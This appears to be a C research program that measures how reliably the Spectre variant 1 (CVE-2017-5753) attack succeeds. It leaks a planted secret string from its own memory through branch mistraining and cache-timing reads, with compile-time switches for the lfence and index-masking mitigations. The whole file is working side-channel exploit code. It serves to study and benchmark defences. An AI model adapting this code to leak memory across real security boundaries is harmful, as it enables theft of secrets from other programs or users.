/* spectre.c - CVE-2017-5753 user-to-user success rate measurement
 *
 * Borrows code from
 * - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
 * - https://github.com/genua/meltdown
 *
 * Copyright (c) 2022 Samuel AUBERTIN
 *
 * Permission to use, copy, modify, and distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <x86intrin.h> /* for rdtscp and clflush */

#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif

#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif

#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2

/* Timing overhead to compensate for. Note that these expand unparenthesized. */
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#else
#define LATENCY 0 /* neither rdtscp nor mfence available; zero overhead is an assumption */
#endif
#endif

#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
 *
 * array_index_mask_nospec() - generate a mask that is ~0UL when the
 * bounds check succeeds and 0 otherwise
 * @index: array element index
 * @size: number of elements in array
 *
 * Returns:
 * 0 - (index < size)
 */
static inline unsigned long
array_index_mask_nospec(unsigned long index, unsigned long size)
{
    unsigned long mask;

    __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
        : "=r" (mask)
        : "g" (size), "r" (index)
        : "cc");
    return mask;
}
#endif //MASKING_MITIGATION
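/*
 * A minimal, self-contained sketch of the mask in action (an illustrative
 * addition for clarity; this helper is not used by the measurement code
 * below). With index = 3 and size = 16, the cmp sets the carry flag, sbb
 * yields ~0UL, and the index passes through unchanged; with index = 20 and
 * size = 16, the mask is 0, so a speculatively out-of-bounds index is
 * clamped to element 0 instead of reaching attacker-chosen memory.
 */
#ifdef MASKING_MITIGATION
__attribute__((unused))
static unsigned long
masked_index_demo(unsigned long index, unsigned long size)
{
    return index & array_index_mask_nospec(index, size);
}
#endif //MASKING_MITIGATION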
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];

/* Flush memory using long SSE instructions */
void
flush_memory_sse(uint8_t *addr)
{
    float *p = (float *)addr;
    float c = 0.f;
    __m128 i = _mm_setr_ps(c, c, c, c);
    int k, l;

    /* Non-sequential memory addressing by looping through k by l */
    for (k = 0; k < 4; k++)
        for (l = 0; l < 4; l++)
            _mm_stream_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH

char *secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";

unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
unsigned cache_hit_threshold;

static inline unsigned
timed_access(volatile uint8_t *addr)
{
    uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
    unsigned int junk = junk;

#ifndef NORDTSCP
    t0 = __rdtscp(&junk);
    junk |= *addr;
    t1 = __rdtscp(&junk);
#else
#ifndef NOMFENCE
    /*
     * Since the rdtsc instruction isn't serialized, newer processors will
     * try to reorder it, ruining its value as a timing mechanism. To get
     * around this, we use the mfence instruction to introduce a memory
     * barrier and force serialization. mfence is used because it is
     * portable across Intel and AMD.
     */
    _mm_mfence();
    t0 = __rdtsc();
    _mm_mfence();
    junk = *addr;
    _mm_mfence();
    t1 = __rdtsc();
    _mm_mfence();
#else
    /*
     * The mfence instruction was introduced with the SSE2 instruction set,
     * so we have to ifdef it out on pre-SSE2 processors. Luckily, these
     * older processors don't seem to reorder the rdtsc instruction, so not
     * having mfence on older processors is less of an issue.
     */
    t0 = __rdtsc();
    junk |= *addr;
    t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP

    return (unsigned)(t1 - t0 - LATENCY);
}

static void
calibrate_threshold(unsigned int *threshold)
{
    volatile char buf[2 * CACHELINE_SIZE];
    volatile uint8_t *bufp;
    int i;
    const int cnt = 10000;
    uint64_t tcache = 0;
    __attribute__((unused)) volatile int junk = 0;

    bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
        ~(CACHELINE_SIZE - 1)));
    junk |= *bufp;
    for (i = 0, tcache = 0; i < cnt; i++) {
        tcache += timed_access(bufp);
    }
    tcache = tcache / cnt;
    if (threshold != NULL) {
        *threshold = tcache + LATENCY;
    }
    return;
}

void
victim_function(size_t x)
{
    if (x < array1_size) {
#ifdef LFENCE_MITIGATION
        /*
         * According to Intel et al, the best way to mitigate this is to
         * add a serializing instruction after the boundary check to force
         * the retirement of previous instructions before proceeding to
         * the read.
         * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
         */
        _mm_lfence();
#endif
#ifdef MASKING_MITIGATION
        x &= array_index_mask_nospec(x, array1_size);
#endif
        temp &= array2[array1[x] * 512];
    }
}
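/*
 * A minimal sketch of the flush+reload probe that leak() below is built
 * from (an illustrative addition, unused by the measurement): evict a
 * cache line, touch it, then classify it as cached by comparing
 * timed_access() against the calibrated threshold. The victim's
 * speculative read of array2[array1[x] * 512] leaves exactly this kind of
 * footprint for one line out of 256.
 */
#ifndef NOCLFLUSH
__attribute__((unused))
static int
probe_demo(volatile uint8_t *line)
{
    _mm_clflush((const void *)line);  /* line is now uncached */
    (void)*line;                      /* reloading it caches it again */
    return timed_access(line) <= cache_hit_threshold; /* expect a hit */
}
#endif //NOCLFLUSH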
void
leak(size_t malicious_x, uint8_t value[2], int score[2],
    unsigned cache_hit_threshold)
{
    static int results[256];
    int tries, i, j, mix_i;
    unsigned int junk = 0;
    size_t training_x, x;
    volatile uint8_t *addr;
#ifdef NOCLFLUSH
    int junk2 = 0;
    int l;
    (void)junk2;
#endif

    for (i = 0; i < 256; i++) {
        results[i] = 0;
    }

    for (tries = 999; tries > 0; tries--) {
#ifndef NOCLFLUSH
        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush(&array2[i * 512]);
#else
        /* Flush array2[256*(0..255)] from cache using long SSE
         * instruction several times */
        for (j = 0; j < 16; j++) {
            for (i = 0; i < 256; i++) {
                flush_memory_sse(&array2[i * 512]);
            }
        }
#endif

        /* 30 loops: 5 training runs (x=training_x) per attack run
         * (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
#ifndef NOCLFLUSH
            _mm_clflush(&array1_size);
#else
            /* Alternative to using clflush to flush the CPU cache.
             * Read addresses at 4096-byte intervals out of a large array.
             * Do this around 2000 times, or more depending on CPU cache
             * size. */
            for (l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1;
                l >= 0; l -= CACHE_FLUSH_STRIDE) {
                junk2 = cache_flush_array[l];
            }
#endif
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x
             * if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16));         /* Set x=-1 if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);
        }

        /* Time reads. Order is lightly mixed up to prevent stride
         * prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;
            addr = &array2[mix_i * 512];
            if (timed_access(addr) <= cache_hit_threshold &&
                mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest result in j */
        j = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                j = i;
            }
        }
        if (results[j] >= 3)
            break;
    }

    results[0] ^= junk; /* use junk so code above won't get optimized out */
    value[0] = (uint8_t)j;
    score[0] = results[j];
}

int
main(int argc, char **argv)
{
    int o;
    size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
    int i, score[2], len = (int)strlen(secret);
    uint8_t value[2];
    unsigned successes = 0;
    int json = 0;

    while ((o = getopt(argc, argv, "t:j")) != EOF) {
        switch (o) {
        case 't':
            cache_hit_threshold = atoi(optarg);
            break;
        case 'j':
            json++;
            break;
        default:
        usage:
            fprintf(stderr, "usage: %s [-j] "
                "[-t threshold]\n"
                "\t-j\t\tJSON output\n"
                "\t-t INT\t\tfixed threshold\n",
                argv[0]);
            return 1;
        }
    }

    if (argc != optind)
        goto usage;

    fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
        argv[0] + 2, (int)strlen(secret));

    calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);

#ifdef NOCLFLUSH
    for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
        cache_flush_array[i] = 1;
    }
#endif

    for (i = 0; i < (int)sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

    while (--len >= 0) {
        leak(malicious_x++, value, score, cache_hit_threshold);
        if (score[0] == 3 && value[0] > 31 && value[0] < 127) {
            successes++;
            fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
        } else {
            fprintf(stderr, "\033[31m?\033[0m");
        }
    }
    fprintf(stderr, "\n");

    if (json) {
        printf("{ \"%s\": { \"capacities\": { ", argv[0] + 2);
#ifndef NORDTSCP
        printf("\"rdtscp\": true, ");
#else
        printf("\"rdtscp\": false, ");
#endif
#ifndef NOMFENCE
        printf("\"mfence\": true, ");
#else
        printf("\"mfence\": false, ");
#endif
#ifndef NOCLFLUSH
        printf("\"clflush\": true ");
#else
        printf("\"clflush\": false ");
#endif
        printf("}, \"mitigations\": { ");
#ifdef LFENCE_MITIGATION
        printf("\"lfence\": true, ");
#else
        printf("\"lfence\": false, ");
#endif
#ifdef MASKING_MITIGATION
        printf("\"masking\": true ");
#else
        printf("\"masking\": false ");
#endif
        printf("}, ");
        printf("\"threshold\": %d, ", cache_hit_threshold);
        printf("\"success\": %.0f } }",
            100 * successes / (float)strlen(secret));
    }

    fprintf(stderr, "[+] %-27s\t", argv[0] + 2);
#ifndef NORDTSCP
    fprintf(stderr, "RDTSCP ");
#else
    fprintf(stderr, "RDTSC ");
#endif
#ifndef NOMFENCE
    fprintf(stderr, "MFENCE ");
#endif
#ifndef NOCLFLUSH
    fprintf(stderr, "CLFLUSH ");
#endif
#ifdef LFENCE_MITIGATION
    fprintf(stderr, "LFENCE_MITIGATION ");
#endif
#ifdef MASKING_MITIGATION
    fprintf(stderr, "MASKING_MITIGATION ");
#endif
    fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n",
        cache_hit_threshold, 100 * successes / (float)strlen(secret));

    return 0;
}
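/*
 * Example build and run (illustrative; these invocations are assumptions,
 * not taken from an original build system). The program expects to be
 * invoked with a "./" prefix, since it prints argv[0] + 2:
 *
 *   $ cc -o spectre spectre.c
 *   $ ./spectre
 *   $ ./spectre -j -t 80                            # JSON output, fixed threshold
 *   $ cc -DLFENCE_MITIGATION -o spectre spectre.c   # measure with lfence fix
 *   $ cc -DMASKING_MITIGATION -o spectre spectre.c  # measure with index masking
 */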